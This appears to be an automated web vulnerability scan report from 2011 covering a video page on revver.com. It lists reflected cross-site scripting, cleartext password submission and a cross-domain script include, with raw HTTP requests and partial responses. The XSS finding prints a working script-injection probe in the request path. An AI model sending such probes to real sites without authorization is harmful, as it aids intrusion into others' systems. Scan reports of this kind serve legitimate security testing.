1. Cross-site scripting (reflected)
2. Cleartext submission of password
3. Cross-domain script include
Severity: High
Confidence: Certain
Host: http://revver.com
Path: /video/426755/peanut-labs

GET /video/426755/peanut-labsf05e7"><script>alert(1)<
Host: revver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:57:06 GMT
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3
Expires: Sun, 09 Jan 2011 03:02:22 GMT
Vary: Cookie
Last-Modified: Sun, 09 Jan 2011 02:57:22 GMT
ETag: 183ed9bf59280eb87751
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 81323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
<head>
...[SNIP]...
<form action="/account/login/
...[SNIP]...
Severity: High
Confidence: Certain
Host: http://revver.com
Path: /video/426755/peanut-labs

GET /video/426755/peanut-labs
Host: revver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:32:22 GMT
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3
Expires: Sun, 09 Jan 2011 02:33:33 GMT
Vary: Cookie
Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT
ETag: b8fdf6d76062d0f9cc23
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 81237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
<head>
...[SNIP]...
<div class="login-form-area">
<form action="/account/login/
<ul class="inline-form clearfix" style="">
...[SNIP]...
</label>
<input id="password" name="password" type="password" /></li>
...[SNIP]...
Severity: Information
Confidence: Certain
Host: http://revver.com
Path: /video/426755/peanut-labs

GET /video/426755/peanut-labs
Host: revver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:32:22 GMT
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3
Expires: Sun, 09 Jan 2011 02:33:33 GMT
Vary: Cookie
Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT
ETag: b8fdf6d76062d0f9cc23
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 81237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner
</script>
...[SNIP]...